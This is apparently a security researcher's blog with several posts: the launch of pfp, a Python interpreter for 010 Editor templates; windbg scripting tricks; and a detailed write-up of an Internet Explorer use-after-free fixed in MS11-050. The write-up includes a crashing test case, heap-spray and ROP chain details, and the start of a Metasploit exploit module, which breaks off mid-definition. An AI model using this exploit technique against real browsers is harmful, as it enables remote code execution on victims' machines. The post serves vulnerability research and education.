Monday, August 10, 2015

PFP - A Python Interpreter for 010 Templates

I am excited to finally announce a project I have been slowly working on for at least five months now: pfp (docs).

PFP stands for Python Format Parser and is a python-based interpreter for Sweetscape's 010 Editor Templates. 010 editor PFP takes an input stream and an 010 editor template and returns a modifiable DOM of the parsed data:

#!/usr/bin/env python
# encoding: utf-8

import os
import pfp
from pfp.fields import PYSTR,PYVAL
import sys

template = """
    BigEndian();
    
    typedef struct {
        // null-terminated
        string label;

        char comment[length - sizeof(label)];
    } TEXT;

    typedef struct {
        uint length<watch=data, update=WatchLength>;
        char cname[4];

        union {
            char raw[length];

            if(cname == "tEXt") {
                TEXT tEXt;
            }
        } data;
        uint crc<watch=cname;data, update=WatchCrc32>;
    } CHUNK;

    uint64 magic;

    while(!FEof()) {
        CHUNK chunks;
    }
"""

png = pfp.parse(
 data_file="~/Documents/image.png",
 template=template,
)

for chunk in png.chunks:
 if chunk.cname == "tEXt":
  print("Comment before: {}".format(chunk.data.tEXt.comment))
  chunk.data.tEXt.comment = "NEW COMMENT"
  print("Comment after: {}".format(chunk.data.tEXt.comment))

with open("/tmp/test.png", "wb") as f:
 png._pfp__build(f)

The above example will use the simple PNG template to parse a png image and change the comment, while keeping length and checksum values correct.

For those who are completely unfamiliar with 010 editor templates, 010 templates parse data by declaring variables. Every variable that is declared (unless prefixed with const or local) parses that amount of data from the input stream. For example. declaring a four-byte character array will parse four bytes from the input stream and display it as a character array.

Installation

PFP can be installed via pip:
pip install pfp

Motivation

My main motivation for writing pfp was to be able to use the large number of already-existing 010 templates from python. The 010 editor GUI is great to do simple modifications, but it does not expose an api and does not have a way (that I know of) to auto-update length calculations, checksums, or parse compressed/encoded data. I used to think that 010 editor was only available on Windows, but I have recently found out it is available on Mac and Linux as well.

PFP has added some extensions to the standard 010 Editor special attributes (what I call metadata in pfp) to allow fields to auto-update their value based on the values of other fields. Metadata extensions also exist in PFP to pack/unpack structures within compressed or encoded data.

Read more about metadata in pfp in the metadata documentation.

Uses

  • Fuzzing
  • General data format modification
  • Data format visualization
  • etc.

Implementation

010 template scripts use a modified C syntax. The main differences are that it allows control-flow statements within struct declarations, and that metadata attributes can be declared as part of a declaration:
struct {
 uchar len<watch=data,update=WatchLength>;
 if(len == 2) {
  short data;
 } else {
  char data[len];
 }
} some_struct;
The first step to implementing PFP was to create an 010 template parser. Since the syntax is so similar to C's syntax, I forked Eli Bendersky's pycparser project and modified it to be able to parse 010 templates. The result is py010parser.

py010parser returns an abstract syntax tree (AST) after parsing a template, which pfp then interprets by iterating over every node in the AST. Writing the interpreter was surprisingly easy, if a tad tedious. I had gotten some inspiration for how to set things up from how firefox's and chrome's javascript interpreters work.

One of the benefits to having the interpreter written in python is that you can now expose native python functions to 010 templates:
from pfp.native import native
from pfp.fields import PYVAL

@native(name="Sum", ret=pfp.fields.Int64)
def sum_numbers(params, ctxt, scope, stream, coord):
        res = 0
        for param in params:
                res += PYVAL(param)
        return res

The sum_numbers python function will be callable from templates as the Sum function. See the functions documentation for more specifics.

Debugger

As I moved from simple template scripts to more complicated ones, it became increasingly difficult to debug errors in my interpreter without an 010 template debugger. So I wrote a template debugger using one of my favorite python modules, the cmd module (one of my other recent-favorites is the sh module):

pfp debugger

You can drop into the interactive debugger by calling Int3() anywhere in a template script. See the debugger documentation for more details.

Vim Plugin

Since vim is my editor of choice (and probably what hackerman uses), I wrote a vim plugin (pfp-vim) to visualize data formats using pfp:
pfp-vim plugin

pfp-vim exposes two commands:
  • :PfpInit - creates ~/.pfp with info about where your templates are stored
  • :PfpParse - parses the current buffer using the template that you choose

Reliability, Bugs, and Testing

I am making a strong effort to have pfp be as stable and reliable as possible. There are currently 110 test cases for the features in pfp. If/when you have a problem with pfp, please submit an issue on github. Pull requests are also always welcome.

laters,

--d0c

mr. monk doing a jig

Wednesday, June 12, 2013

Windbg Tricks - Javascript Windbg Instrumentation

This post is going to cover three levels of usefulness of windbg instrumentation via javascript : subpar, normal, and abnormal.

SUBPAR

The most basic way of instrumenting windbg via javascript is to set a breakpoint on a simple function, such as Math.atan, call Math.atan at the appropriate time in javascript to force windbg to break, and then do whatever you need to do in windbg. Useful, yes, but it's lame and gets extremely tiring after the first time of doing it.

NORMAL

A better way to instrument windbg via javascript is to create a way for javascript to print a message in windbg (and trigger a break):
bu jscript!Js::Math::Atan ".printf \"DEBUG: %mu\\n\", poi(poi(esp+10)+c) ; g"
(If you want to break, remove the ; g)

That's cool, but what if you want to do something a little more complicated, like track all allocations of a specific size after certain javascript statements have been executed. With the previous method, the javascript would have to look something like this:
function log(msg) {
    Math.atan(msg);
}

function track_all_allocations_and_frees_size_x20() {
    Math.asin();
}

log("Executing main javascript");
execute_main_javascript();

log("Track all allocations and frees now");
track_all_allocations_and_frees_size_x20();
do_something_cool();
... and the windbg breakpoints would be something like this:
bu jscript!Js::Math::Atan ".printf \"DEBUG: %mu\\n\", poi(poi(esp+10)+c) ; g"
bu jscript!Js::Math::Asin "bp ntdll!RtlAllocateHeap .if(poi(esp+c) == 0x20) { .echo ALLOCATED ONE ; knL } ; g"
This is more useful, but is still very inflexible. For every new javascript<-->windbg binding you might want, you'd need to also modify your breakpoints in windbg.

ABNORMAL

Below is an abnormally useful way to instrument windbg with javascript:
bu jscript!Js::Math::Atan ".block { .shell -ci \".printf \\\"%mu\\\\n\\\", poi(poi(esp+10)+c)\" find /v \"13333333337\" > cmd_to_exec.txt & exit } ; $$><cmd_to_exec.txt"
This lets you execute windbg commands directly from javascript. The breakpoint basically does an eval("WINDBG_CMD") with a string from memory. Broken down, the breakpoint goes like this:
.block {
    .shell -ci ".printf \"%mu\\n\", poi(poi(esp+10)+c)" find /v \"13333333337\" > cmd_to_exec.txt
}
$$<>cmd_to_exec.txt
Using .block helps to end the .shell command, since semicolons don't work as statement endings for the .shell command (see this article on msdn for more details).

find /v "13333333337" > cmd_to_exec.txt simply saves what was printf'd to the file cmd_to_exec.txt. Specifically, the find command filters out all lines from stdin that contain 13333333337. Any string here will work as long as you never expect to see it in a windbg command that you'd execute via javascript.

$$<>cmd_to_exec.txt runs the string we saved to cmd_to_exec.txt as a windbg script.

This method makes things much simpler. Going back to the first example, we can now do things like this:
function exec(cmd) {
    Math.atan(cmd);
}
function log(msg) {
    exec(".echo " + msg);
}
function track_allocations(size) {
    exec('bp ntdll!RtlAllocateHeap ".if(poi(esp+c) == 0n' + size + '){ .echo ALLOCATED ONE ; knL } ; g" ; g');
}

log("Executing main javascript");
execute_main_javascript();

var alloc_size = 0x20;
log("Tracking allocations of size " + alloc_size.toString(0x10));
track_allocations(0x20);
do_something_cool();
Almost makes you wish you could write a javascript interface to windbg, doesn't it?

Abnormally useful. Laters.

Saturday, April 13, 2013

Windbg Tricks - Module Relocation

When ASLR is not supported, pseudo ASLR is often used to introduce a degree of entropy in where the module is loaded into memory.

The basic idea behind pseudo ASLR is to pre-allocate memory at the location of a module's preferred base address. This forces the module to be loaded at a non-predetermined address. See this for more details.

I stumbled across the windbg command !imgreloc the other day. It can be used to show all modules that have been relocated, and what their original preferred base address is.

Below is the output when run while attached to firefox.exe (see this ticket about dll blocking and this firefox ticket for a specific history of pseudo ASLR in firefox):

0:017> !imgreloc
00280000 sqlite3 - RELOCATED from 10000000
00300000 js3250 - RELOCATED from 10000000
00400000 firefox - at preferred address
004e0000 nspr4 - RELOCATED from 10000000
00510000 smime3 - RELOCATED from 10000000
00530000 nss3 - RELOCATED from 10000000
005d0000 nssutil3 - RELOCATED from 10000000
005f0000 plc4 - RELOCATED from 10000000
00600000 plds4 - RELOCATED from 10000000
00610000 ssl3 - RELOCATED from 10000000
00640000 xpcom - RELOCATED from 10000000
01220000 browserdirprovider - RELOCATED from 10000000
01540000 brwsrcmp - RELOCATED from 10000000
01de0000 nssdbm3 - RELOCATED from 10000000
02000000 xpsp2res - RELOCATED from 00010000
036a0000 softokn3 - RELOCATED from 10000000
03980000 freebl3 - RELOCATED from 10000000
039d0000 nssckbi - RELOCATED from 10000000
10000000 xul - at preferred address
59a60000 dbghelp - at preferred address
5ad70000 uxtheme - at preferred address
0:017> .shell -ci "!imgreloc" findstr RELOCATED
00280000 sqlite3 - RELOCATED from 10000000
00300000 js3250 - RELOCATED from 10000000
004e0000 nspr4 - RELOCATED from 10000000
00510000 smime3 - RELOCATED from 10000000
00530000 nss3 - RELOCATED from 10000000
005d0000 nssutil3 - RELOCATED from 10000000
005f0000 plc4 - RELOCATED from 10000000
00600000 plds4 - RELOCATED from 10000000
00610000 ssl3 - RELOCATED from 10000000
00640000 xpcom - RELOCATED from 10000000
01220000 browserdirprovider - RELOCATED from 10000000
01540000 brwsrcmp - RELOCATED from 10000000
01de0000 nssdbm3 - RELOCATED from 10000000
02000000 xpsp2res - RELOCATED from 00010000
036a0000 softokn3 - RELOCATED from 10000000
03980000 freebl3 - RELOCATED from 10000000
039d0000 nssckbi - RELOCATED from 10000000

Searching for preferred instead of RELOCATED will yield a list of modules that should remain at their preferred address (and thus be usable for ROP or other such techniques).

Windbg Tricks

I have a long list of common windbg tricks that I use. I plan on putting many of them on this blog with the label windbg trick.

This is mainly for my own use so I don't forget about them. Maybe they will be useful for others as well.

Thursday, June 16, 2011

Insecticides don't kill bugs, Patch Tuesdays do

Patch Tuesdays kill bugs. This post is about a bug that I had independently found and written an exploit for that was killed last Tuesday with bulletin MS11-050. I'm not sure which CVE this vulnerability has been assigned, all I know is that [UPDATE] It's definitely CVE-2011-1260 - see Jose's (of spa-s3c.blogspot.com) blog post about it (he originally submitted it to ZDI (ZDI-11-194) -> MS). MS11-050 has fixed the vulnerability I was using to achieve RCE on IE 7 and 8 (6 and 9 are also affected, but I didn't make a working exploit for them). This blog post goes over some of the details of the vulnerability, as well as the exploit that I've made for it. Note that all examples in this post were made with IE 8.

The Vuln

What

The vuln is a use-after-free vulnerability in Internet Explorer. This occurs when invalid mshtml!CObjectElements are handled. When an invalid <object> element exists in a web page that is covered by other visible html elements (due to their positioning or styles), formats get computed on a previously-freed mshtml!CObjectElement. If other data has happened to be written over where the object element used to be in memory, invalid values may be used when the freed object is handled (such as a vtable pointer).

A simple test case is below:
<html>
    <body>
        <script language='javascript'>
            document.body.innerHTML += "<object align='right' hspace='1000'   width='1000'>TAG_1</object>";
            document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
            document.body.innerHTML += "AAAAAAA";
            document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
        </script>
    </body>
</html>
Loading this up in a vulnerable version of Internet Explorer should give you a crash on an access violation like the one below:
(170.5c8): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=01e88df0 ecx=001f000d edx=00000000 esi=0162c2e8 edi=00000000
eip=3cf76b82 esp=0162c2bc ebp=0162c2d4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CElement::Doc+0x2:
3cf76b82 8b5070          mov     edx,dword ptr [eax+70h] ds:0023:00000070=????????
The function it is crashing in is the mshtml!CElement::Doc function:
0:008> u mshtml!CElement::Doc
mshtml!CElement::Doc:
3cf76b80 8b01            mov     eax,dword ptr [ecx]
3cf76b82 8b5070          mov     edx,dword ptr [eax+70h] <-- crashes here
3cf76b85 ffd2            call    edx
3cf76b87 8b400c          mov     eax,dword ptr [eax+0Ch]
3cf76b8a c3              ret
3cf76b8b 90              nop
3cf76b8c 90              nop
3cf76b8d 90              nop
The backtrace should look like this:
0:008> knL
 # ChildEBP RetAddr  
00 0162c2b8 3cf14ae1 mshtml!CElement::Doc+0x2
01 0162c2d4 3cf14d4a mshtml!CTreeNode::ComputeFormats+0xb9
02 0162c580 3cf239fe mshtml!CTreeNode::ComputeFormatsHelper+0x44
03 0162c590 3cf239be mshtml!CTreeNode::GetFancyFormatIndexHelper+0x11
04 0162c5a0 3cf239a5 mshtml!CTreeNode::GetFancyFormatHelper+0xf
05 0162c5b4 3d0a6d9f mshtml!CTreeNode::GetFancyFormat+0x35
06 0162c5bc 3d0a6cfa mshtml!CLineCore::AO_GetFancyFormat+0x23
07 0162c5f0 3cf69f34 mshtml!CRecalcLinePtr::RecalcMargins+0x19d
08 0162cde8 3cfb98e4 mshtml!CDisplay::RecalcLines+0x6e4
09 0162cec4 3cf25d39 mshtml!CDisplay::WaitForRecalc+0x208
0a 0162cf14 3cf4938b mshtml!CFlowLayout::Notify+0x7d7
0b 0162cf20 3cf4745e mshtml!NotifyElement+0x41
0c 0162cf74 3cf473f5 mshtml!CMarkup::SendNotification+0x60
0d 0162cf9c 3cf5254a mshtml!CMarkup::Notify+0xd4
0e 0162cfe4 3cf256ea mshtml!CElement::SendNotification+0x4a
0f 0162d008 3cef1318 mshtml!CElement::EnsureRecalcNotify+0x15f
10 0162d084 3cef2461 mshtml!CDisplayPointer::MoveUnit+0x2b2
11 0162d170 3cef22ce mshtml!CHTMLEditor::AdjustPointer+0x16f
12 0162d1a4 3cef34ed mshtml!CEditTracker::AdjustPointerForInsert+0x8b
13 0162d200 3cef3361 mshtml!CCaretTracker::PositionCaretAt+0x141
Now that you know a little about the crash, you want to know more or less what's going on, right? After some initial sleuthing, I set the breakpoints below to print out the type of objects that were being allocated and freed by printing out their vtable pointer.
0:008> bl
 0 e 635a6811     0001 (0001)  0:**** mshtml!CreateElement+0x57 ".printf \"mshtml!CreateElement created element at %08x, of type: %08x\\n\", poi(ebp+10), poi(poi(ebp+10)); g"
 1 e 6362582e     0001 (0001)  0:**** mshtml!CTreeNode::Release+0x27 ".printf \"mshtml!CTreeNode::Release, freeing pointer to obj at %08x, obj at %08x, of type %08x\\n\", edx, poi(edx), poi(poi(edx)); g"
 2 e 635a3272     0001 (0001)  0:**** mshtml!CTreeNode::CTreeNode+0x8c ".printf \"mshtml!CTreeNode::CTreeNode allocated obj at %08x, ref to obj %08x of type %08x\\n\", eax, poi(eax), poi(poi(eax)); g"
After setting the breakpoints and reloading the test case in Internet Explorer, windbg should print out something like this:
 0:016> g
 ...
 mshtml!CTreeNode::CTreeNode allocated obj at 0023f220, ref to obj 001f7c50 of type 637666e0 <--- EBX (23f220)
 mshtml!CTreeNode::CTreeNode allocated obj at 0023f640, ref to obj 0021a1d8 of type 63630788
 mshtml!CTreeNode::CTreeNode allocated obj at 0023f6f0, ref to obj 02bba4f0 of type 6362fa90
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f278, obj at 00213e48, of type 635afad0
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f4e0, obj at 00218948, of type 635af850
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f380, obj at 002140b0, of type 635ba8c0
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f488, obj at 002185e8, of type 635af580
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f328, obj at 00218648, of type 635a21b0
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f118, obj at 0021a088, of type 635ad1f8
 mshtml!CTreeNode::CTreeNode allocated obj at 0023f118, ref to obj 00218618 of type 635a21b0
 mshtml!CTreeNode::CTreeNode allocated obj at 0023f488, ref to obj 00218588 of type 635af580
 mshtml!CTreeNode::CTreeNode allocated obj at 0023f380, ref to obj 00218408 of type 635af850
 mshtml!CTreeNode::CTreeNode allocated obj at 0023f4e0, ref to obj 00213b70 of type 635afad0
 mshtml!CTreeNode::CTreeNode allocated obj at 0023f278, ref to obj 00213e10 of type 635ba8c0
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f220, obj at 001f7c50, of type 637666e0 <--- EBX (23f220)
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f4e0, obj at 00213b70, of type 635afad0
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f380, obj at 00218408, of type 635af850
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f278, obj at 00213e10, of type 635ba8c0
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f488, obj at 00218588, of type 635af580
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f118, obj at 00218618, of type 635a21b0
 (d30.ab4): Access violation - code c0000005 (first chance)
 First chance exceptions are reported before any exception handling.
 This exception may be expected and handled.
 eax=00000000 ebx=0023f220 ecx=001f00bd edx=00000000 esi=020be380 edi=00000000 <--- EBX is 23f220
 eip=6363fcc6 esp=020be354 ebp=020be36c iopl=0         nv up ei pl zr na pe nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
 mshtml!CElement::Doc+0x2:
 6363fcc6 8b5070          mov     edx,dword ptr [eax+70h] ds:0023:00000070=????????
Now that we know the vtable pointer of the object (637666e0), a quick lookup will tell us which object we are dealing with:
0:008> ln 637666e0
(637666e0)   mshtml!CObjectElement::`vftable'   |  (63639e88)   mshtml!CDummyUnknown::`vftable'
Exact matches:
 mshtml!CObjectElement::`vftable' = <no type information>
ebx in this instance is the pointer to the object that IE is calling the Doc function on, eax then becomes the vtable pointer, and edx is supposed to be the valid function on the CObjectElement that is supposed to be called:
(.frame 1 - mshtml!CTreeNode::ComputeFormats+0xb)
3cf14ada 8b0b            mov     ecx,dword ptr [ebx]     <-- ebx = pointer to a CObjectElement
                                                             ecx = pointer to vtable
3cf14adc e89f200600      call    mshtml!CElement::Doc (3cf76b80)
...
(mshtml!CElement::Doc)
3cf76b80 8b01            mov     eax,dword ptr [ecx]     <-- eax = CObjectElement vtable
3cf76b82 8b5070          mov     edx,dword ptr [eax+70h] <-- edx = function (vtable+0x70)
3cf76b85 ffd2            call    edx
3cf76b87 8b400c          mov     eax,dword ptr [eax+0Ch]
The function that was supposed to be called is the mshtml!CElement::SecurityContext function:
0:008> x mshtml!CObjectElement*vftable*
3d2db488 mshtml!CObjectElement::`vftable' = 
0:008> ?  3d2db488+70
Evaluate expression: 1026405624 = 3d2db4f8

(memory @ 3d2db488 - pointer and symbol:)
00 3d2db488 3cf93385 mshtml!CObjectElement::PrivateQueryInterface
04 3d2db48c 3cf89f6d mshtml!CElement::PrivateAddRef
08 3d2db490 3cf7e481 mshtml!CElement::PrivateRelease
0c 3d2db494 3d2db6e9 mshtml!CObjectElement::`vector deleting destructor'
10 3d2db498 3cebe591 mshtml!CSite::Init
14 3d2db49c 3d2db72e mshtml!CObjectElement::Passivate
18 3d2db4a0 3cf79975 mshtml!CBase::IsRootObject
1c 3d2db4a4 3cf08e95 mshtml!CBase::EnumerateTrackedReferences
20 3d2db4a8 3d1a9a42 mshtml!CBase::SetTrackedState
24 3d2db4ac 3cf4581e mshtml!CElement::GetInlineStylePtr
28 3d2db4b0 3cf2381f mshtml!CElement::GetRuntimeStylePtr
2c 3d2db4b4 3d246af6 mshtml!CBase::VersionedGetIDsOfNames
30 3d2db4b8 3d1cd70f mshtml!CElement::VersionedInvoke
34 3d2db4bc 3d2def3c mshtml!COleSite::VersionedGetDispID
38 3d2db4c0 3d2db832 mshtml!CObjectElement::VersionedInvokeEx
3c 3d2db4c4 3d200dcb mshtml!CBase::VersionedDeleteMemberByName
40 3d2db4c8 3d200e47 mshtml!CBase::VersionedDeleteMemberByDispID
44 3d2db4cc 3cf41bde mshtml!CBase::VersionedGetNextDispID
48 3d2db4d0 3d00deae mshtml!CBase::VersionedGetMemberName
4c 3d2db4d4 3cf41bde mshtml!CBase::VersionedGetNextDispID
50 3d2db4d8 3d246b45 mshtml!CBase::VersionedGetNameSpaceParent
54 3d2db4dc 3d2011b2 mshtml!CBase::GetEnabled
58 3d2db4e0 3d2011b2 mshtml!CBase::GetEnabled
5c 3d2db4e4 3d2df38e mshtml!COleSite::GetPages
60 3d2db4e8 3d2df340 mshtml!COleSite::InterfaceSupportsErrorInfo
64 3d2db4ec 3d2de127 mshtml!CObjectElement::QueryStatus
68 3d2db4f0 3d2de1a7 mshtml!CObjectElement::Exec
6c 3d2db4f4 3cf492cc mshtml!CFlowLayout::IsFlowOrSelectLayout
70 3d2db4f8 3cf76b50 mshtml!CElement::SecurityContext

Why

I noticed that if I comment out one of the tags in the test case (to keep IE from crashing),
<html>
    <body>
        <script language='javascript'>
            document.body.innerHTML += "<object align='right' hspace='1000'   width='1000'>TAG_1</object>";
            //document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
            document.body.innerHTML += "AAAAAAA";
            document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
        </script>
    </body>
</html>
and then go into the developer tools and look at the current state of the DOM, the <object> element doesn't show up, probably because I never specified which type of object it needs to be:


Knowing this, taking another look at the stacktrace of a crash should give us the gist of the rest:
0:008> k
ChildEBP RetAddr  
020be350 63602718 mshtml!CElement::Doc+0x2
020be36c 636026a3 mshtml!CTreeNode::ComputeFormats+0xb9
020be618 63612a85 mshtml!CTreeNode::ComputeFormatsHelper+0x44
020be628 63612a45 mshtml!CTreeNode::GetFancyFormatIndexHelper+0x11
020be638 63612a2c mshtml!CTreeNode::GetFancyFormatHelper+0xf
020be64c 637d29ab mshtml!CTreeNode::GetFancyFormat+0x35
020be654 637d2906 mshtml!CLineCore::AO_GetFancyFormat+0x23
020be688 63675c93 mshtml!CRecalcLinePtr::RecalcMargins+0x19d
020bee80 6369985f mshtml!CDisplay::RecalcLines+0x6e4
020bef5c 6361c037 mshtml!CDisplay::WaitForRecalc+0x208
020befac 636514de mshtml!CFlowLayout::Notify+0x7d7
020befb8 636017f2 mshtml!NotifyElement+0x41
020bf00c 6365134f mshtml!CMarkup::SendNotification+0x60
020bf034 63666bc1 mshtml!CMarkup::Notify+0xd4
020bf07c 6361bf07 mshtml!CElement::SendNotification+0x4a
020bf0a0 635d82b7 mshtml!CElement::EnsureRecalcNotify+0x15f
020bf11c 635cc225 mshtml!CDisplayPointer::MoveUnit+0x2b2
020bf208 635cc092 mshtml!CHTMLEditor::AdjustPointer+0x16f
020bf23c 635cd2af mshtml!CEditTracker::AdjustPointerForInsert+0x8b
020bf298 635cd123 mshtml!CCaretTracker::PositionCaretAt+0x141
My guess of the overall flow of things leading up to the crash is that the <object> element was initially added to some list of elements to be displayed. The object element then gets deleted because it is invalid and has nothing to display, but it isn't removed from the list. Something happens with the layout where formats need to be recalculated, and IE tries to call a method on the freed object, leading to the use-after-free.

The Exploit

The basic plan for exploiting this vulnerability should be to cause the <object> element to be freed, get data that we control to overwrite the freed object, and then do something that would cause functions to be called on the object element. Simple enough. The exploit for IE7 and IE8 with DEP disabled involves your basic heap spray (nops + shellcode) and overwriting the CObjectElement with 0c0c0c0cs. Once the mshtml!CElement::Doc function is called, code execution should go something like this:
mshtml!CElement::Doc:
3cf76b80 8b01            mov     eax,dword ptr [ecx]  ds:0023:147f00a7=0c0c0c0c
3cf76b82 8b5070          mov     edx,dword ptr [eax+70h] ds:0023:0c0c0c7c=0c0c0c0c
3cf76b85 ffd2            call    edx {<Unloaded_sspc.dll>+0xc0c0c0b (0c0c0c0c)} <-- (execute nops+shellcode)
3cf76b87 8b400c          mov     eax,dword ptr [eax+0Ch]
3cf76b8a c3              ret
The exploit for IE8 with DEP enabled required a ROP payload: the CObjectElement is overwritten with 0c0c0c0cs, a second heap-spray should land the ROP stack at 0c0c0c0c, and a third heap-spray should land the nops + shellcode at 0x23000000. Once everything is all setup, the ROP stack should be found at 0c0c0c0c and should look like this:
0c0c0c0c 7c809af1 ; 1:kernel32!VirtualAlloc (first ret)
0c0c0c10 7c901db3 ; 2:ntdll!memcpy (second ret)
0c0c0c14 7f000000 ; 1:VirtualAlloc:lpAddress
0c0c0c18 00004000 ; 1:VirtualAlloc:dwSize
0c0c0c1c 00003000 ; 1:VirtualAlloc:flAllocationType MEM_COMMIT | MEM_RESERVE
0c0c0c20 00000040 ; 1:VirtualAlloc:flProtect rwx
0c0c0c24 7f001000 ; 3:nops+shellcode (third ret)
0c0c0c28 7f001000 ; 2:memcpy:dst
0c0c0c2c 23000100 ; 2:memcpy:src
0c0c0c30 00002fff ; 2:memcpy:size
0c0c0c34 be9e2688 ; random
0c0c0c38 f285b61c ; random
0c0c0c3c e8f23175 ; random
0c0c0c40 6f2edb99 ; random
0c0c0c44 bd93f4eb ; random
0c0c0c48 527787a7 ; random
0c0c0c4c 4991e07d ; random
0c0c0c50 1513dcf2 ; random
0c0c0c54 7b40bc07 ; random
0c0c0c58 ba54da55 ; random
0c0c0c5c 5177fafb ; random
0c0c0c60 b1dfcf01 ; random
0c0c0c64 6643baa9 ; random
0c0c0c68 2136edc5 ; random
0c0c0c6c 31fd6e6b ; random
0c0c0c70 f4a9dcd0 ; random
0c0c0c74 de2f62e1 ; random
0c0c0c78 a19314eb ; random
0c0c0c7c 773e3f18 ; comctl32!CImageList::_IsSameObject+0x40 ; stack pivot
0c0c0c80 3825a2d7 ; random
0c0c0c84 88f8a84d ; random
0c0c0c88 0566b421 ; random
Once the mshtml!CElement::Doc function is called, code execution should look like this:
mshtml!CElement::Doc:
3cf76b80 8b01            mov     eax,dword ptr [ecx]  ds:0023:35a00002=0c0c0c0c
3cf76b82 8b5070          mov     edx,dword ptr [eax+70h] ds:0023:0c0c0c7c=773e3f18
3cf76b85 ffd2            call    edx {comctl32!CImageList::_IsSameObject+0x40 (773e3f18)} ; stack pivot
The first ROP gadget is a stack-pivot that exchanges esp with eax (0c0c0c0c):
0:007> u comctl32!CImageList::_IsSameObject+40 L?2
comctl32!CImageList::_IsSameObject+0x40:
773e3f18 94              xchg    eax,esp  ; esp is now 0c0c0c0c
773e3f19 c3              ret              ; ret to kernel32!VirtualAlloc
After the stack-pivot is called, the stack (esp) should be at 0c0c0c0c. When the stack-pivot rets, it will ret into kernel32!VirtualAlloc, after which the ROP-stack should look like this:
mem @ esp (rop stack):
0c0c0c10 7c901db3 ; 2:ntdll!memcpy (second ret)
0c0c0c14 7f000000 ; 1:VirtualAlloc:lpAddress
0c0c0c18 00004000 ; 1:VirtualAlloc:dwSize
0c0c0c1c 00003000 ; 1:VirtualAlloc:flAllocationType MEM_COMMIT | MEM_RESERVE
0c0c0c20 00000040 ; 1:VirtualAlloc:flProtect rwx
0c0c0c24 7f001000 ; 3:nops+shellcode (third ret)
0c0c0c28 7f001000 ; 2:memcpy:dst
0c0c0c2c 23000100 ; 2:memcpy:src
0c0c0c30 00002fff ; 2:memcpy:size
kernel32!VirtualAlloc should then allocate 0x4000 read/write/execute bytes at address 0x7f000000 and return to ntdll!memcpy:
kernel32!VirtualAlloc:
7c809af1 8bff            mov     edi,edi
7c809af3 55              push    ebp
7c809af4 8bec            mov     ebp,esp
7c809af6 ff7514          push    dword ptr [ebp+14h]  ss:0023:0c0c0c20=00000040 ; flProtect (rwx)
7c809af9 ff7510          push    dword ptr [ebp+10h]  ss:0023:0c0c0c1c=00003000 ; flAllocationType (MEM_COMMIT | MEM_RESERVE)
7c809afc ff750c          push    dword ptr [ebp+0Ch]  ss:0023:0c0c0c18=00004000 ; dwSize
7c809aff ff7508          push    dword ptr [ebp+8]    ss:0023:0c0c0c14=7f000000 ; lpAddress
7c809b02 6aff            push    0FFFFFFFFh
7c809b04 e809000000      call    kernel32!VirtualAllocEx (7c809b12)
7c809b09 5d              pop     ebp
7c809b0a c21000          ret     10h                                            ; ret to ntdll!memcpy
After the ret to ntdll!memcpy, the ROP-stack should look like this:
mem @ esp:
0c0c0c24 7f001000 ; 3:nops+shellcode (third ret)
0c0c0c28 7f001000 ; 2:memcpy:dst
0c0c0c2c 23000100 ; 2:memcpy:src
0c0c0c30 00002fff ; 2:memcpy:size
ntdll!memcpy should then copy 0x2fff bytes from 0x23000100 (should be nops+shellcode) to 0x7f001000 (rwx memory allocated by call to VirtualAlloc) and return to the nops+shellcode at 0x7f001000:
ntdll!memcpy:
7c901db3 55              push    ebp
7c901db4 8bec            mov     ebp,esp
7c901db6 57              push    edi
7c901db7 56              push    esi
7c901db8 8b750c          mov     esi,dword ptr [ebp+0Ch] ss:0023:0c0c0c2c=23000100 ; src
7c901dbb 8b4d10          mov     ecx,dword ptr [ebp+10h] ss:0023:0c0c0c30=00002fff ; size
7c901dbe 8b7d08          mov     edi,dword ptr [ebp+8] ss:0023:0c0c0c28=7f001000   ; dst
...
7c901de6 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]               ; copy nops+shellcode to 0x7f001000
...
7c901f4d c9              leave
7c901f4e c3              ret                                                       ; ret to 7f001000 (nops+shellcode)
Below is the metasploit module I've made to exploit this vulnerability. I've tested it on a 32-bit WinXP SP3 fully patched up to (not including) this month's (June's) patches:
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    include Msf::Exploit::Remote::HttpServer::HTML
    include Msf::Exploit::Remote::BrowserAutopwn
    autopwn_info({
        :ua_name    => HttpClients::IE,
        :ua_minver  => "7.0",
        :ua_maxver  => "8.0",
        :javascript => true,
        :os_name    => OperatingSystems::WINDOWS,
        :vuln_test  => nil, 
    })

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'IE mshtml!CObjectElement Use After Free',
            'Description'    => %q{
                This module exploits a use-after-free vulnerability in Internet Explorer. The vulnerability
                occurs when an invalid <object> tag exists and other elements overlap/cover where the object
                tag should be when rendered (due to their styles/positioning). The mshtml!CObjectElement is
                then freed from memory because it is invalid. However, the mshtml!CDisplay object for the page 
                continues to keep a reference to the freed <object> and attempts to call a function on it,
                leading to the use-after-free.
            },
            'Author'         =>
                [
                    'd0c_s4vage',
                ],
            'Version'        => 'Version 1.0',
            'References'     =>
                [
                    ["MSB", "MS11-050"],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'thread',
                    'InitialAutoRunScript' => 'migrate -f',
                },
            'Payload'        =>
